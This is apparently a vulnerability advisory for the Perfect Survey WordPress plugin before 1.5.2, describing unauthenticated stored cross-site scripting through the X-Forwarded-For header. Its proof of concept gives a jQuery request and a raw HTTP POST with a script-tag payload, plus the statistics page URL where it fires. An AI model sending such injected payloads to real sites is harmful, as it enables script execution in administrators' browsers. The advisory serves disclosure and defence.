Perfect Survey < 1.5.2 - Unauthenticated Stored Cross-Site Scripting

Description
The plugin does not validate and escape the X-Forwarded-For header value before outputting it in the statistic page when the Anonymize IP setting of a survey is turned off, leading to a Stored Cross-Site Scripting issue

Proof of Concept

jQuery.post({data:{

ps_questions:{1:["1"]},

action:"save_question_data",

ID:"765",

},url:"https://example.com/wp-admin/admin-ajax.php",headers:{"X-Forwarded-For":"<script>alert(/XSS/)</script>"}})





POST /wp-admin/admin-ajax.php HTTP/1.1

Accept: */*

Accept-Language: en-GB,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Forwarded-For: <script>alert(/XSS/)</script>

X-Requested-With: XMLHttpRequest

Content-Length: 60

Connection: close



ps_questions%5B1%5D%5B%5D=1&action=save_question_data&ID=765





Then go to https://example.com/wp-admin/edit.php?post_type=ps&page=single_statistic&id=765 

References

https://wpscan.com/vulnerability/4440e7ca-1a55-444d-8f6c-04153302d750